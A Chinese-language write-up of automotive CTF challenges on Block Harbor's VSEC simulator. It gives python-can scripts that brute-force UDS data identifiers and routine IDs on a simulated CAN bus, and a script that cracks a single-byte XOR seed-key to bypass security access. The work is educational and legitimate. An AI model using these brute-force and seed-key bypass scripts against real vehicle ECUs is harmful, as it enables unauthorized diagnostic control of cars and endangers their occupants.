Block Harbor 是一家专注于汽车网络安全领域的公司,Block Harbor 组织的汽车CTF挑战赛,第一季以教育和乐趣为核心,教授参与者如何嗅探CAN总线并发送控制信息。赛事迅速获得了社区的积极响应,并发展成为一个全球性的活动,吸引了来自亚洲、中东、欧洲和北美的900多名参与者。
-
第一季赛事结束后,Block Harbor 通过其平台VSEC公开了50个独特的汽车挑战,并提供了5000美元的奖金,激发了更广泛的参与和社区建设。
-
第二季赛事预计将在2024年8月24日至9月8日举行,奖金池增至10万美元(From Garage to Glory: The Rise of a $100K Automotive Capture the Flag Challenge – Block Harbor)
继第一部分WriteUP发出后,收到很多师傅关注,也有很多师傅动手做了起来
欢迎大家与我们交流,继续第三弹
再次感谢yichen投稿,yichen yyds
VSEC Garage: User Space Diagnostics
User Space Diagnostics 的系列题目需要用到另一个终端
Read Data By Identifier
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.Can you identify the data?翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。您能识别数据吗?
打开里面 candump 也没东西,有点不知所措了🤦,发了个 7DF 的也没人(ECU)回复,试着给 7E0 发了个请求倒是回复了个 NRC,表示这个 ID 不支持,再根据题目意思,看样子是想让我爆破一下?搓个脚本试试
import canimport timeimport binasciibus = can.Bus(interface='socketcan', channel='vcan0')for i in range(0,0xFF):for j in range(0,0xFF):message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x03, 0x22, i, j, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()bus.shutdown()
当发到 0008 的时候就正常读取到了信息,算出题人有良心,记一颗红豆
那么接下来发个流控,读完它
cansend vcan0 7E0#03220008cansend vcan0 7E0#3000000000000000
把数据解析一下得到:bh{identified_by_what???}
Routine Control
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.I hear routine control has a lot of fun features.翻译:这项挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。我听说常规控制有很多有趣的功能。
使用 Routine Control 服务来执行已定义的步骤序列并获取任何相关结果,服务 ID 是 0x31子功能也比较简单,开始(01)、停止(02)、获取结果(03)那先试试开始执行吧,简单试了试都是否定响应,估计也得爆破
写个脚本跑去吧
import canimport timeimport binasciibus = can.Bus(interface='socketcan', channel='vcan0')bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])for i in range(0,0xFF):for j in range(0,0xFF):time.sleep(0.01)message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x04, 0x31, 0x01, i, j, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')if result == "037f3131":passelse:print("i: ",hex(i)," j: ",hex(j))bus.shutdown()
跑了一段时间发现 1337 是响应的,因此先执行 1337 然后再获取结果,得到:bh{c0ntroll1ng_th3_r0ut1nes}
Security Access Level 1
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.I hear single byte XOR keys are a great security measure, can you prove me wrong?翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器中进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。我听说单字节 XOR 密钥是一种很好的安全措施,你能证明我错了吗?
安全访问 level1 单字节的异或密钥,那直接上脚本爆破吧
import canimport timeimport binasciibus = can.Bus(interface='socketcan', channel='vcan0')bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])for key in range(0,0xFF):message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()time.sleep(1)message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')seed = result[6:14]key1 = int(seed[:2],16) ^ keykey2 = int(seed[2:4],16) ^ keykey3 = int(seed[4:6],16) ^ keykey4 = int(seed[6:8],16) ^ keymessage = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')if result == "037f2735":passelse:print("key: ",hex(key))bus.shutdown()
直到爆破到 0x20 的时候才成功,再发个流控得到 flag
因此:bh{whats_wrong_with_static_keys?}
import canimport timeimport binasciibus = can.Bus(interface='socketcan', channel='vcan0')bus.set_filters([{"can_id": 0x7E8, "can_mask": 0xFFF, "extended": False}])message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x02, 0x27, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')seed = result[6:14]key1 = int(seed[:2],16) ^ 0x20key2 = int(seed[2:4],16) ^ 0x20key3 = int(seed[4:6],16) ^ 0x20key4 = int(seed[6:8],16) ^ 0x20message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x06, 0x27, 0x02, key1, key2, key3, key4, 0x00])bus.send(message, timeout=0.2)msg = bus.recv()result = binascii.hexlify(msg.data).decode('utf-8')print(result)message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])bus.send(message, timeout=0.2)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)msg = bus.recv(timeout=0.2)result = binascii.hexlify(msg.data).decode('utf-8')print(result)bus.shutdown()
Read Memory By Address
题目描述:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.I wonder whats at 0xc0ffe000?翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。我想知道 0xc0ffe000 是什么?
就是读内存呗,上脚本
原文始发于微信公众号(安全脉脉):【WriteUP】VSEC 车联网安全 CTF 挑战赛(三)
